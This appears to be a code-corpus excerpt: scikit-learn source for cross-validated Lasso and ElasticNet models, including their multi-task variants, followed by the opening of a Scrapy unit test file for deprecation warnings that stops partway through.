class LinearModelCV(six.with_metaclass(ABCMeta, LinearModel)):
"""Base class for iterative model fitting along a regularization path"""
@abstractmethod
def __init__(self, eps=1e-3, n_alphas=100, alphas=None, fit_intercept=True,
normalize=False, precompute='auto', max_iter=1000, tol=1e-4,
copy_X=True, cv=None, verbose=False, n_jobs=1,
positive=False, random_state=None, selection='cyclic'):
self.eps = eps
self.n_alphas = n_alphas
self.alphas = alphas
self.fit_intercept = fit_intercept
self.normalize = normalize
self.precompute = precompute
self.max_iter = max_iter
self.tol = tol
self.copy_X = copy_X
self.cv = cv
self.verbose = verbose
self.n_jobs = n_jobs
self.positive = positive
self.random_state = random_state
self.selection = selection
def fit(self, X, y):
"""Fit linear model with coordinate descent
Fit is on grid of alphas and best alpha estimated by cross-validation.
Parameters
----------
X : {array-like}, shape (n_samples, n_features)
Training data. Pass directly as float64, Fortran-contiguous data
to avoid unnecessary memory duplication. If y is mono-output,
X can be sparse.
y : array-like, shape (n_samples,) or (n_samples, n_targets)
Target values
"""
y = np.asarray(y, dtype=np.float64)
if y.shape[0] == 0:
raise ValueError("y has 0 samples: %r" % y)
if hasattr(self, 'l1_ratio'):
model_str = 'ElasticNet'
else:
model_str = 'Lasso'
if isinstance(self, ElasticNetCV) or isinstance(self, LassoCV):
if model_str == 'ElasticNet':
model = ElasticNet()
else:
model = Lasso()
if y.ndim > 1 and y.shape[1] > 1:
raise ValueError("For multi-task outputs, use "
"MultiTask%sCV" % (model_str))
y = column_or_1d(y, warn=True)
else:
if sparse.isspmatrix(X):
raise TypeError("X should be dense but a sparse matrix was"
"passed")
elif y.ndim == 1:
raise ValueError("For mono-task outputs, use "
"%sCV" % (model_str))
if model_str == 'ElasticNet':
model = MultiTaskElasticNet()
else:
model = MultiTaskLasso()
if self.selection not in ["random", "cyclic"]:
raise ValueError("selection should be either random or cyclic.")
# This makes sure that there is no duplication in memory.
# Dealing right with copy_X is important in the following:
# Multiple functions touch X and subsamples of X and can induce a
# lot of duplication of memory
copy_X = self.copy_X and self.fit_intercept
if isinstance(X, np.ndarray) or sparse.isspmatrix(X):
# Keep a reference to X
reference_to_old_X = X
# Let us not impose fortran ordering or float64 so far: it is
# not useful for the cross-validation loop and will be done
# by the model fitting itself
X = check_array(X, 'csc', copy=False)
if sparse.isspmatrix(X):
if not np.may_share_memory(reference_to_old_X.data, X.data):
# X is a sparse matrix and has been copied
copy_X = False
elif not np.may_share_memory(reference_to_old_X, X):
# X has been copied
copy_X = False
del reference_to_old_X
else:
X = check_array(X, 'csc', dtype=np.float64, order='F', copy=copy_X)
copy_X = False
if X.shape[0] != y.shape[0]:
raise ValueError("X and y have inconsistent dimensions (%d != %d)"
% (X.shape[0], y.shape[0]))
# All LinearModelCV parameters except 'cv' are acceptable
path_params = self.get_params()
if 'l1_ratio' in path_params:
l1_ratios = np.atleast_1d(path_params['l1_ratio'])
# For the first path, we need to set l1_ratio
path_params['l1_ratio'] = l1_ratios[0]
else:
l1_ratios = [1, ]
path_params.pop('cv', None)
path_params.pop('n_jobs', None)
alphas = self.alphas
n_l1_ratio = len(l1_ratios)
if alphas is None:
alphas = []
for l1_ratio in l1_ratios:
alphas.append(_alpha_grid(
X, y, l1_ratio=l1_ratio,
fit_intercept=self.fit_intercept,
eps=self.eps, n_alphas=self.n_alphas,
normalize=self.normalize,
copy_X=self.copy_X))
else:
# Making sure alphas is properly ordered.
alphas = np.tile(np.sort(alphas)[::-1], (n_l1_ratio, 1))
# We want n_alphas to be the number of alphas used for each l1_ratio.
n_alphas = len(alphas[0])
path_params.update({'n_alphas': n_alphas})
path_params['copy_X'] = copy_X
# We are not computing in parallel, we can modify X
# inplace in the folds
if not (self.n_jobs == 1 or self.n_jobs is None):
path_params['copy_X'] = False
# init cross-validation generator
cv = check_cv(self.cv, X)
# Compute path for all folds and compute MSE to get the best alpha
folds = list(cv)
best_mse = np.inf
# We do a double for loop folded in one, in order to be able to
# iterate in parallel on l1_ratio and folds
jobs = (delayed(_path_residuals)(X, y, train, test, self.path,
path_params, alphas=this_alphas,
l1_ratio=this_l1_ratio, X_order='F',
dtype=np.float64)
for this_l1_ratio, this_alphas in zip(l1_ratios, alphas)
for train, test in folds)
mse_paths = Parallel(n_jobs=self.n_jobs, verbose=self.verbose,
backend="threading")(jobs)
mse_paths = np.reshape(mse_paths, (n_l1_ratio, len(folds), -1))
mean_mse = np.mean(mse_paths, axis=1)
self.mse_path_ = np.squeeze(np.rollaxis(mse_paths, 2, 1))
for l1_ratio, l1_alphas, mse_alphas in zip(l1_ratios, alphas,
mean_mse):
i_best_alpha = np.argmin(mse_alphas)
this_best_mse = mse_alphas[i_best_alpha]
if this_best_mse < best_mse:
best_alpha = l1_alphas[i_best_alpha]
best_l1_ratio = l1_ratio
best_mse = this_best_mse
self.l1_ratio_ = best_l1_ratio
self.alpha_ = best_alpha
if self.alphas is None:
self.alphas_ = np.asarray(alphas)
if n_l1_ratio == 1:
self.alphas_ = self.alphas_[0]
# Remove duplicate alphas in case alphas is provided.
else:
self.alphas_ = np.asarray(alphas[0])
# Refit the model with the parameters selected
common_params = dict((name, value)
for name, value in self.get_params().items()
if name in model.get_params())
model.set_params(**common_params)
model.alpha = best_alpha
model.l1_ratio = best_l1_ratio
model.copy_X = copy_X
model.precompute = False
model.fit(X, y)
if not hasattr(self, 'l1_ratio'):
del self.l1_ratio_
self.coef_ = model.coef_
self.intercept_ = model.intercept_
self.dual_gap_ = model.dual_gap_
self.n_iter_ = model.n_iter_
return self
class LassoCV(LinearModelCV, RegressorMixin):
"""Lasso linear model with iterative fitting along a regularization path
The best model is selected by cross-validation.
The optimization objective for Lasso is::
(1 / (2 * n_samples)) * ||y - Xw||^2_2 + alpha * ||w||_1
Read more in the :ref:`User Guide <lasso>`.
Parameters
----------
eps : float, optional
Length of the path. ``eps=1e-3`` means that
``alpha_min / alpha_max = 1e-3``.
n_alphas : int, optional
Number of alphas along the regularization path
alphas : numpy array, optional
List of alphas where to compute the models.
If ``None`` alphas are set automatically
precompute : True | False | 'auto' | array-like
Whether to use a precomputed Gram matrix to speed up
calculations. If set to ``'auto'`` let us decide. The Gram
matrix can also be passed as argument.
max_iter : int, optional
The maximum number of iterations
tol : float, optional
The tolerance for the optimization: if the updates are
smaller than ``tol``, the optimization code checks the
dual gap for optimality and continues until it is smaller
than ``tol``.
cv : integer or cross-validation generator, optional
If an integer is passed, it is the number of fold (default 3).
Specific cross-validation objects can be passed, see the
:mod:`sklearn.cross_validation` module for the list of possible
objects.
verbose : bool or integer
Amount of verbosity.
n_jobs : integer, optional
Number of CPUs to use during the cross validation. If ``-1``, use
all the CPUs.
positive : bool, optional
If positive, restrict regression coefficients to be positive
selection : str, default 'cyclic'
If set to 'random', a random coefficient is updated every iteration
rather than looping over features sequentially by default. This
(setting to 'random') often leads to significantly faster convergence
especially when tol is higher than 1e-4.
random_state : int, RandomState instance, or None (default)
The seed of the pseudo random number generator that selects
a random feature to update. Useful only when selection is set to
'random'.
fit_intercept : boolean, default True
whether to calculate the intercept for this model. If set
to false, no intercept will be used in calculations
(e.g. data is expected to be already centered).
normalize : boolean, optional, default False
If ``True``, the regressors X will be normalized before regression.
copy_X : boolean, optional, default True
If ``True``, X will be copied; else, it may be overwritten.
Attributes
----------
alpha_ : float
The amount of penalization chosen by cross validation
coef_ : array, shape (n_features,) | (n_targets, n_features)
parameter vector (w in the cost function formula)
intercept_ : float | array, shape (n_targets,)
independent term in decision function.
mse_path_ : array, shape (n_alphas, n_folds)
mean square error for the test set on each fold, varying alpha
alphas_ : numpy array, shape (n_alphas,)
The grid of alphas used for fitting
dual_gap_ : ndarray, shape ()
The dual gap at the end of the optimization for the optimal alpha
(``alpha_``).
n_iter_ : int
number of iterations run by the coordinate descent solver to reach
the specified tolerance for the optimal alpha.
Notes
-----
See examples/linear_model/lasso_path_with_crossvalidation.py
for an example.
To avoid unnecessary memory duplication the X argument of the fit method
should be directly passed as a Fortran-contiguous numpy array.
See also
--------
lars_path
lasso_path
LassoLars
Lasso
LassoLarsCV
"""
path = staticmethod(lasso_path)
def __init__(self, eps=1e-3, n_alphas=100, alphas=None, fit_intercept=True,
normalize=False, precompute='auto', max_iter=1000, tol=1e-4,
copy_X=True, cv=None, verbose=False, n_jobs=1,
positive=False, random_state=None, selection='cyclic'):
super(LassoCV, self).__init__(
eps=eps, n_alphas=n_alphas, alphas=alphas,
fit_intercept=fit_intercept, normalize=normalize,
precompute=precompute, max_iter=max_iter, tol=tol, copy_X=copy_X,
cv=cv, verbose=verbose, n_jobs=n_jobs, positive=positive,
random_state=random_state, selection=selection)
class ElasticNetCV(LinearModelCV, RegressorMixin):
"""Elastic Net model with iterative fitting along a regularization path
The best model is selected by cross-validation.
Read more in the :ref:`User Guide <elastic_net>`.
Parameters
----------
l1_ratio : float, optional
float between 0 and 1 passed to ElasticNet (scaling between
l1 and l2 penalties). For ``l1_ratio = 0``
the penalty is an L2 penalty. For ``l1_ratio = 1`` it is an L1 penalty.
For ``0 < l1_ratio < 1``, the penalty is a combination of L1 and L2
This parameter can be a list, in which case the different
values are tested by cross-validation and the one giving the best
prediction score is used. Note that a good choice of list of
values for l1_ratio is often to put more values close to 1
(i.e. Lasso) and less close to 0 (i.e. Ridge), as in ``[.1, .5, .7,
.9, .95, .99, 1]``
eps : float, optional
Length of the path. ``eps=1e-3`` means that
``alpha_min / alpha_max = 1e-3``.
n_alphas : int, optional
Number of alphas along the regularization path, used for each l1_ratio.
alphas : numpy array, optional
List of alphas where to compute the models.
If None alphas are set automatically
precompute : True | False | 'auto' | array-like
Whether to use a precomputed Gram matrix to speed up
calculations. If set to ``'auto'`` let us decide. The Gram
matrix can also be passed as argument.
max_iter : int, optional
The maximum number of iterations
tol : float, optional
The tolerance for the optimization: if the updates are
smaller than ``tol``, the optimization code checks the
dual gap for optimality and continues until it is smaller
than ``tol``.
cv : integer or cross-validation generator, optional
If an integer is passed, it is the number of fold (default 3).
Specific cross-validation objects can be passed, see the
:mod:`sklearn.cross_validation` module for the list of possible
objects.
verbose : bool or integer
Amount of verbosity.
n_jobs : integer, optional
Number of CPUs to use during the cross validation. If ``-1``, use
all the CPUs.
positive : bool, optional
When set to ``True``, forces the coefficients to be positive.
selection : str, default 'cyclic'
If set to 'random', a random coefficient is updated every iteration
rather than looping over features sequentially by default. This
(setting to 'random') often leads to significantly faster convergence
especially when tol is higher than 1e-4.
random_state : int, RandomState instance, or None (default)
The seed of the pseudo random number generator that selects
a random feature to update. Useful only when selection is set to
'random'.
fit_intercept : boolean
whether to calculate the intercept for this model. If set
to false, no intercept will be used in calculations
(e.g. data is expected to be already centered).
normalize : boolean, optional, default False
If ``True``, the regressors X will be normalized before regression.
copy_X : boolean, optional, default True
If ``True``, X will be copied; else, it may be overwritten.
Attributes
----------
alpha_ : float
The amount of penalization chosen by cross validation
l1_ratio_ : float
The compromise between l1 and l2 penalization chosen by
cross validation
coef_ : array, shape (n_features,) | (n_targets, n_features)
Parameter vector (w in the cost function formula),
intercept_ : float | array, shape (n_targets, n_features)
Independent term in the decision function.
mse_path_ : array, shape (n_l1_ratio, n_alpha, n_folds)
Mean square error for the test set on each fold, varying l1_ratio and
alpha.
alphas_ : numpy array, shape (n_alphas,) or (n_l1_ratio, n_alphas)
The grid of alphas used for fitting, for each l1_ratio.
n_iter_ : int
number of iterations run by the coordinate descent solver to reach
the specified tolerance for the optimal alpha.
Notes
-----
See examples/linear_model/lasso_path_with_crossvalidation.py
for an example.
To avoid unnecessary memory duplication the X argument of the fit method
should be directly passed as a Fortran-contiguous numpy array.
The parameter l1_ratio corresponds to alpha in the glmnet R package
while alpha corresponds to the lambda parameter in glmnet.
More specifically, the optimization objective is::
1 / (2 * n_samples) * ||y - Xw||^2_2 +
+ alpha * l1_ratio * ||w||_1
+ 0.5 * alpha * (1 - l1_ratio) * ||w||^2_2
If you are interested in controlling the L1 and L2 penalty
separately, keep in mind that this is equivalent to::
a * L1 + b * L2
for::
alpha = a + b and l1_ratio = a / (a + b).
See also
--------
enet_path
ElasticNet
"""
path = staticmethod(enet_path)
def __init__(self, l1_ratio=0.5, eps=1e-3, n_alphas=100, alphas=None,
fit_intercept=True, normalize=False, precompute='auto',
max_iter=1000, tol=1e-4, cv=None, copy_X=True,
verbose=0, n_jobs=1, positive=False, random_state=None,
selection='cyclic'):
self.l1_ratio = l1_ratio
self.eps = eps
self.n_alphas = n_alphas
self.alphas = alphas
self.fit_intercept = fit_intercept
self.normalize = normalize
self.precompute = precompute
self.max_iter = max_iter
self.tol = tol
self.cv = cv
self.copy_X = copy_X
self.verbose = verbose
self.n_jobs = n_jobs
self.positive = positive
self.random_state = random_state
self.selection = selection
###############################################################################
# Multi Task ElasticNet and Lasso models (with joint feature selection)
class MultiTaskElasticNet(Lasso):
"""Multi-task ElasticNet model trained with L1/L2 mixed-norm as regularizer
The optimization objective for MultiTaskElasticNet is::
(1 / (2 * n_samples)) * ||Y - XW||^Fro_2
+ alpha * l1_ratio * ||W||_21
+ 0.5 * alpha * (1 - l1_ratio) * ||W||_Fro^2
Where::
||W||_21 = \sum_i \sqrt{\sum_j w_{ij}^2}
i.e. the sum of norm of each row.
Read more in the :ref:`User Guide <multi_task_lasso>`.
Parameters
----------
alpha : float, optional
Constant that multiplies the L1/L2 term. Defaults to 1.0
l1_ratio : float
The ElasticNet mixing parameter, with 0 < l1_ratio <= 1.
For l1_ratio = 0 the penalty is an L1/L2 penalty. For l1_ratio = 1 it
is an L1 penalty.
For ``0 < l1_ratio < 1``, the penalty is a combination of L1/L2 and L2.
fit_intercept : boolean
whether to calculate the intercept for this model. If set
to false, no intercept will be used in calculations
(e.g. data is expected to be already centered).
normalize : boolean, optional, default False
If ``True``, the regressors X will be normalized before regression.
copy_X : boolean, optional, default True
If ``True``, X will be copied; else, it may be overwritten.
max_iter : int, optional
The maximum number of iterations
tol : float, optional
The tolerance for the optimization: if the updates are
smaller than ``tol``, the optimization code checks the
dual gap for optimality and continues until it is smaller
than ``tol``.
warm_start : bool, optional
When set to ``True``, reuse the solution of the previous call to fit as
initialization, otherwise, just erase the previous solution.
selection : str, default 'cyclic'
If set to 'random', a random coefficient is updated every iteration
rather than looping over features sequentially by default. This
(setting to 'random') often leads to significantly faster convergence
especially when tol is higher than 1e-4.
random_state : int, RandomState instance, or None (default)
The seed of the pseudo random number generator that selects
a random feature to update. Useful only when selection is set to
'random'.
Attributes
----------
intercept_ : array, shape (n_tasks,)
Independent term in decision function.
coef_ : array, shape (n_tasks, n_features)
Parameter vector (W in the cost function formula). If a 1D y is \
passed in at fit (non multi-task usage), ``coef_`` is then a 1D array
n_iter_ : int
number of iterations run by the coordinate descent solver to reach
the specified tolerance.
Examples
--------
>>> from sklearn import linear_model
>>> clf = linear_model.MultiTaskElasticNet(alpha=0.1)
>>> clf.fit([[0,0], [1, 1], [2, 2]], [[0, 0], [1, 1], [2, 2]])
... #doctest: +NORMALIZE_WHITESPACE
MultiTaskElasticNet(alpha=0.1, copy_X=True, fit_intercept=True,
l1_ratio=0.5, max_iter=1000, normalize=False, random_state=None,
selection='cyclic', tol=0.0001, warm_start=False)
>>> print(clf.coef_)
[[ 0.45663524 0.45612256]
[ 0.45663524 0.45612256]]
>>> print(clf.intercept_)
[ 0.0872422 0.0872422]
See also
--------
ElasticNet, MultiTaskLasso
Notes
-----
The algorithm used to fit the model is coordinate descent.
To avoid unnecessary memory duplication the X argument of the fit method
should be directly passed as a Fortran-contiguous numpy array.
"""
def __init__(self, alpha=1.0, l1_ratio=0.5, fit_intercept=True,
normalize=False, copy_X=True, max_iter=1000, tol=1e-4,
warm_start=False, random_state=None, selection='cyclic'):
self.l1_ratio = l1_ratio
self.alpha = alpha
self.coef_ = None
self.fit_intercept = fit_intercept
self.normalize = normalize
self.max_iter = max_iter
self.copy_X = copy_X
self.tol = tol
self.warm_start = warm_start
self.random_state = random_state
self.selection = selection
def fit(self, X, y):
"""Fit MultiTaskLasso model with coordinate descent
Parameters
-----------
X : ndarray, shape (n_samples, n_features)
Data
y : ndarray, shape (n_samples, n_tasks)
Target
Notes
-----
Coordinate descent is an algorithm that considers each column of
data at a time hence it will automatically convert the X input
as a Fortran-contiguous numpy array if necessary.
To avoid memory re-allocation it is advised to allocate the
initial data in memory directly using that format.
"""
# X and y must be of type float64
X = check_array(X, dtype=np.float64, order='F',
copy=self.copy_X and self.fit_intercept)
y = np.asarray(y, dtype=np.float64)
if hasattr(self, 'l1_ratio'):
model_str = 'ElasticNet'
else:
model_str = 'Lasso'
if y.ndim == 1:
raise ValueError("For mono-task outputs, use %s" % model_str)
n_samples, n_features = X.shape
_, n_tasks = y.shape
if n_samples != y.shape[0]:
raise ValueError("X and y have inconsistent dimensions (%d != %d)"
% (n_samples, y.shape[0]))
X, y, X_mean, y_mean, X_std = center_data(
X, y, self.fit_intercept, self.normalize, copy=False)
if not self.warm_start or self.coef_ is None:
self.coef_ = np.zeros((n_tasks, n_features), dtype=np.float64,
order='F')
l1_reg = self.alpha * self.l1_ratio * n_samples
l2_reg = self.alpha * (1.0 - self.l1_ratio) * n_samples
self.coef_ = np.asfortranarray(self.coef_) # coef contiguous in memory
if self.selection not in ['random', 'cyclic']:
raise ValueError("selection should be either random or cyclic.")
random = (self.selection == 'random')
self.coef_, self.dual_gap_, self.eps_, self.n_iter_ = \
cd_fast.enet_coordinate_descent_multi_task(
self.coef_, l1_reg, l2_reg, X, y, self.max_iter, self.tol,
check_random_state(self.random_state), random)
self._set_intercept(X_mean, y_mean, X_std)
if self.dual_gap_ > self.eps_:
warnings.warn('Objective did not converge, you might want'
' to increase the number of iterations')
# return self for chaining fit and predict calls
return self
class MultiTaskLasso(MultiTaskElasticNet):
"""Multi-task Lasso model trained with L1/L2 mixed-norm as regularizer
The optimization objective for Lasso is::
(1 / (2 * n_samples)) * ||Y - XW||^2_Fro + alpha * ||W||_21
Where::
||W||_21 = \sum_i \sqrt{\sum_j w_{ij}^2}
i.e. the sum of norm of earch row.
Read more in the :ref:`User Guide <multi_task_lasso>`.
Parameters
----------
alpha : float, optional
Constant that multiplies the L1/L2 term. Defaults to 1.0
fit_intercept : boolean
whether to calculate the intercept for this model. If set
to false, no intercept will be used in calculations
(e.g. data is expected to be already centered).
normalize : boolean, optional, default False
If ``True``, the regressors X will be normalized before regression.
copy_X : boolean, optional, default True
If ``True``, X will be copied; else, it may be overwritten.
max_iter : int, optional
The maximum number of iterations
tol : float, optional
The tolerance for the optimization: if the updates are
smaller than ``tol``, the optimization code checks the
dual gap for optimality and continues until it is smaller
than ``tol``.
warm_start : bool, optional
When set to ``True``, reuse the solution of the previous call to fit as
initialization, otherwise, just erase the previous solution.
selection : str, default 'cyclic'
If set to 'random', a random coefficient is updated every iteration
rather than looping over features sequentially by default. This
(setting to 'random') often leads to significantly faster convergence
especially when tol is higher than 1e-4
random_state : int, RandomState instance, or None (default)
The seed of the pseudo random number generator that selects
a random feature to update. Useful only when selection is set to
'random'.
Attributes
----------
coef_ : array, shape (n_tasks, n_features)
parameter vector (W in the cost function formula)
intercept_ : array, shape (n_tasks,)
independent term in decision function.
n_iter_ : int
number of iterations run by the coordinate descent solver to reach
the specified tolerance.
Examples
--------
>>> from sklearn import linear_model
>>> clf = linear_model.MultiTaskLasso(alpha=0.1)
>>> clf.fit([[0,0], [1, 1], [2, 2]], [[0, 0], [1, 1], [2, 2]])
MultiTaskLasso(alpha=0.1, copy_X=True, fit_intercept=True, max_iter=1000,
normalize=False, random_state=None, selection='cyclic', tol=0.0001,
warm_start=False)
>>> print(clf.coef_)
[[ 0.89393398 0. ]
[ 0.89393398 0. ]]
>>> print(clf.intercept_)
[ 0.10606602 0.10606602]
See also
--------
Lasso, MultiTaskElasticNet
Notes
-----
The algorithm used to fit the model is coordinate descent.
To avoid unnecessary memory duplication the X argument of the fit method
should be directly passed as a Fortran-contiguous numpy array.
"""
def __init__(self, alpha=1.0, fit_intercept=True, normalize=False,
copy_X=True, max_iter=1000, tol=1e-4, warm_start=False,
random_state=None, selection='cyclic'):
self.alpha = alpha
self.coef_ = None
self.fit_intercept = fit_intercept
self.normalize = normalize
self.max_iter = max_iter
self.copy_X = copy_X
self.tol = tol
self.warm_start = warm_start
self.l1_ratio = 1.0
self.random_state = random_state
self.selection = selection
class MultiTaskElasticNetCV(LinearModelCV, RegressorMixin):
"""Multi-task L1/L2 ElasticNet with built-in cross-validation.
The optimization objective for MultiTaskElasticNet is::
(1 / (2 * n_samples)) * ||Y - XW||^Fro_2
+ alpha * l1_ratio * ||W||_21
+ 0.5 * alpha * (1 - l1_ratio) * ||W||_Fro^2
Where::
||W||_21 = \sum_i \sqrt{\sum_j w_{ij}^2}
i.e. the sum of norm of each row.
Read more in the :ref:`User Guide <multi_task_lasso>`.
Parameters
----------
eps : float, optional
Length of the path. ``eps=1e-3`` means that
``alpha_min / alpha_max = 1e-3``.
alphas : array-like, optional
List of alphas where to compute the models.
If not provided, set automatically.
n_alphas : int, optional
Number of alphas along the regularization path
l1_ratio : float or array of floats
The ElasticNet mixing parameter, with 0 < l1_ratio <= 1.
For l1_ratio = 0 the penalty is an L1/L2 penalty. For l1_ratio = 1 it
is an L1 penalty.
For ``0 < l1_ratio < 1``, the penalty is a combination of L1/L2 and L2.
fit_intercept : boolean
whether to calculate the intercept for this model. If set
to false, no intercept will be used in calculations
(e.g. data is expected to be already centered).
normalize : boolean, optional, default False
If ``True``, the regressors X will be normalized before regression.
copy_X : boolean, optional, default True
If ``True``, X will be copied; else, it may be overwritten.
max_iter : int, optional
The maximum number of iterations
tol : float, optional
The tolerance for the optimization: if the updates are
smaller than ``tol``, the optimization code checks the
dual gap for optimality and continues until it is smaller
than ``tol``.
cv : integer or cross-validation generator, optional
If an integer is passed, it is the number of fold (default 3).
Specific cross-validation objects can be passed, see the
:mod:`sklearn.cross_validation` module for the list of possible
objects.
verbose : bool or integer
Amount of verbosity.
n_jobs : integer, optional
Number of CPUs to use during the cross validation. If ``-1``, use
all the CPUs. Note that this is used only if multiple values for
l1_ratio are given.
selection : str, default 'cyclic'
If set to 'random', a random coefficient is updated every iteration
rather than looping over features sequentially by default. This
(setting to 'random') often leads to significantly faster convergence
especially when tol is higher than 1e-4.
random_state : int, RandomState instance, or None (default)
The seed of the pseudo random number generator that selects
a random feature to update. Useful only when selection is set to
'random'.
Attributes
----------
intercept_ : array, shape (n_tasks,)
Independent term in decision function.
coef_ : array, shape (n_tasks, n_features)
Parameter vector (W in the cost function formula).
alpha_ : float
The amount of penalization chosen by cross validation
mse_path_ : array, shape (n_alphas, n_folds) or \
(n_l1_ratio, n_alphas, n_folds)
mean square error for the test set on each fold, varying alpha
alphas_ : numpy array, shape (n_alphas,) or (n_l1_ratio, n_alphas)
The grid of alphas used for fitting, for each l1_ratio
l1_ratio_ : float
best l1_ratio obtained by cross-validation.
n_iter_ : int
number of iterations run by the coordinate descent solver to reach
the specified tolerance for the optimal alpha.
Examples
--------
>>> from sklearn import linear_model
>>> clf = linear_model.MultiTaskElasticNetCV()
>>> clf.fit([[0,0], [1, 1], [2, 2]],
... [[0, 0], [1, 1], [2, 2]])
... #doctest: +NORMALIZE_WHITESPACE
MultiTaskElasticNetCV(alphas=None, copy_X=True, cv=None, eps=0.001,
fit_intercept=True, l1_ratio=0.5, max_iter=1000, n_alphas=100,
n_jobs=1, normalize=False, random_state=None, selection='cyclic',
tol=0.0001, verbose=0)
>>> print(clf.coef_)
[[ 0.52875032 0.46958558]
[ 0.52875032 0.46958558]]
>>> print(clf.intercept_)
[ 0.00166409 0.00166409]
See also
--------
MultiTaskElasticNet
ElasticNetCV
MultiTaskLassoCV
Notes
-----
The algorithm used to fit the model is coordinate descent.
To avoid unnecessary memory duplication the X argument of the fit method
should be directly passed as a Fortran-contiguous numpy array.
"""
path = staticmethod(enet_path)
def __init__(self, l1_ratio=0.5, eps=1e-3, n_alphas=100, alphas=None,
fit_intercept=True, normalize=False,
max_iter=1000, tol=1e-4, cv=None, copy_X=True,
verbose=0, n_jobs=1, random_state=None, selection='cyclic'):
self.l1_ratio = l1_ratio
self.eps = eps
self.n_alphas = n_alphas
self.alphas = alphas
self.fit_intercept = fit_intercept
self.normalize = normalize
self.max_iter = max_iter
self.tol = tol
self.cv = cv
self.copy_X = copy_X
self.verbose = verbose
self.n_jobs = n_jobs
self.random_state = random_state
self.selection = selection
class MultiTaskLassoCV(LinearModelCV, RegressorMixin):
"""Multi-task L1/L2 Lasso with built-in cross-validation.
The optimization objective for MultiTaskLasso is::
(1 / (2 * n_samples)) * ||Y - XW||^Fro_2 + alpha * ||W||_21
Where::
||W||_21 = \sum_i \sqrt{\sum_j w_{ij}^2}
i.e. the sum of norm of each row.
Read more in the :ref:`User Guide <multi_task_lasso>`.
Parameters
----------
eps : float, optional
Length of the path. ``eps=1e-3`` means that
``alpha_min / alpha_max = 1e-3``.
alphas : array-like, optional
List of alphas where to compute the models.
If not provided, set automaticlly.
n_alphas : int, optional
Number of alphas along the regularization path
fit_intercept : boolean
whether to calculate the intercept for this model. If set
to false, no intercept will be used in calculations
(e.g. data is expected to be already centered).
normalize : boolean, optional, default False
If ``True``, the regressors X will be normalized before regression.
copy_X : boolean, optional, default True
If ``True``, X will be copied; else, it may be overwritten.
max_iter : int, optional
The maximum number of iterations.
tol : float, optional
The tolerance for the optimization: if the updates are
smaller than ``tol``, the optimization code checks the
dual gap for optimality and continues until it is smaller
than ``tol``.
cv : integer or cross-validation generator, optional
If an integer is passed, it is the number of fold (default 3).
Specific cross-validation objects can be passed, see the
:mod:`sklearn.cross_validation` module for the list of possible
objects.
verbose : bool or integer
Amount of verbosity.
n_jobs : integer, optional
Number of CPUs to use during the cross validation. If ``-1``, use
all the CPUs. Note that this is used only if multiple values for
l1_ratio are given.
selection : str, default 'cyclic'
If set to 'random', a random coefficient is updated every iteration
rather than looping over features sequentially by default. This
(setting to 'random') often leads to significantly faster convergence
especially when tol is higher than 1e-4.
random_state : int, RandomState instance, or None (default)
The seed of the pseudo random number generator that selects
a random feature to update. Useful only when selection is set to
'random'.
Attributes
----------
intercept_ : array, shape (n_tasks,)
Independent term in decision function.
coef_ : array, shape (n_tasks, n_features)
Parameter vector (W in the cost function formula).
alpha_ : float
The amount of penalization chosen by cross validation
mse_path_ : array, shape (n_alphas, n_folds)
mean square error for the test set on each fold, varying alpha
alphas_ : numpy array, shape (n_alphas,)
The grid of alphas used for fitting.
n_iter_ : int
number of iterations run by the coordinate descent solver to reach
the specified tolerance for the optimal alpha.
See also
--------
MultiTaskElasticNet
ElasticNetCV
MultiTaskElasticNetCV
Notes
-----
The algorithm used to fit the model is coordinate descent.
To avoid unnecessary memory duplication the X argument of the fit method
should be directly passed as a Fortran-contiguous numpy array.
"""
path = staticmethod(lasso_path)
def __init__(self, eps=1e-3, n_alphas=100, alphas=None, fit_intercept=True,
normalize=False, max_iter=1000, tol=1e-4, copy_X=True,
cv=None, verbose=False, n_jobs=1, random_state=None,
selection='cyclic'):
super(MultiTaskLassoCV, self).__init__(
eps=eps, n_alphas=n_alphas, alphas=alphas,
fit_intercept=fit_intercept, normalize=normalize,
max_iter=max_iter, tol=tol, copy_X=copy_X,
cv=cv, verbose=verbose, n_jobs=n_jobs, random_state=random_state,
selection=selection)
| bsd-3-clause |
wangjun/scrapy | tests/test_utils_deprecate.py | 140 | 10526 | # -*- coding: utf-8 -*-
from __future__ import absolute_import
import inspect
import unittest
import warnings
from scrapy.exceptions import ScrapyDeprecationWarning
from scrapy.utils.deprecate import create_deprecated_class, update_classpath
from tests import mock
class MyWarning(UserWarning):
pass
class SomeBaseClass(object):
pass
class NewName(SomeBaseClass):
pass
class WarnWhenSubclassedTest(unittest.TestCase):
def _mywarnings(self, w, category=MyWarning):
return [x for x in w if x.category is MyWarning]
def test_no_warning_on_definition(self):
with warnings.catch_warnings(record=True) as w:
Deprecated = create_deprecated_class('Deprecated', NewName)
w = self._mywarnings(w)
self.assertEqual(w, [])
def test_subclassing_warning_message(self):
Deprecated = create_deprecated_class('Deprecated', NewName,
warn_category=MyWarning)
with warnings.catch_warnings(record=True) as w:
class UserClass(Deprecated):
pass
w = self._mywarnings(w)
self.assertEqual(len(w), 1)
self.assertEqual(
str(w[0].message),
"tests.test_utils_deprecate.UserClass inherits from "
"deprecated class tests.test_utils_deprecate.Deprecated, "
"please inherit from tests.test_utils_deprecate.NewName."
" (warning only on first subclass, there may be others)"
)
self.assertEqual(w[0].lineno, inspect.getsourcelines(UserClass)[1])
def test_custom_class_paths(self):
Deprecated = create_deprecated_class('Deprecated', NewName,
new_class_path='foo.NewClass',
old_class_path='bar.OldClass',
warn_category=MyWarning)
with warnings.catch_warnings(record=True) as w:
class UserClass(Deprecated):
pass
_ = Deprecated()
w = self._mywarnings(w)
self.assertEqual(len(w), 2)
self.assertIn('foo.NewClass', str(w[0].message))
self.assertIn('bar.OldClass', str(w[0].message))
self.assertIn('foo.NewClass', str(w[1].message))
self.assertIn('bar.OldClass', str(w[1].message))
def test_subclassing_warns_only_on_direct_childs(self):
Deprecated = create_deprecated_class('Deprecated', NewName,
warn_once=False,
warn_category=MyWarning)
with warnings.catch_warnings(record=True) as w:
class UserClass(Deprecated):
pass
class NoWarnOnMe(UserClass):
pass
w = self._mywarnings(w)
self.assertEqual(len(w), 1)
self.assertIn('UserClass', str(w[0].message))
def test_subclassing_warns_once_by_default(self):
Deprecated = create_deprecated_class('Deprecated', NewName,
warn_category=MyWarning)
with warnings.catch_warnings(record=True) as w:
class UserClass(Deprecated):
pass
class FooClass(Deprecated):
pass
class BarClass(Deprecated):
pass
w = self._mywarnings(w)
self.assertEqual(len(w), 1)
self.assertIn('UserClass', str(w[0].message))
def test_warning_on_instance(self):
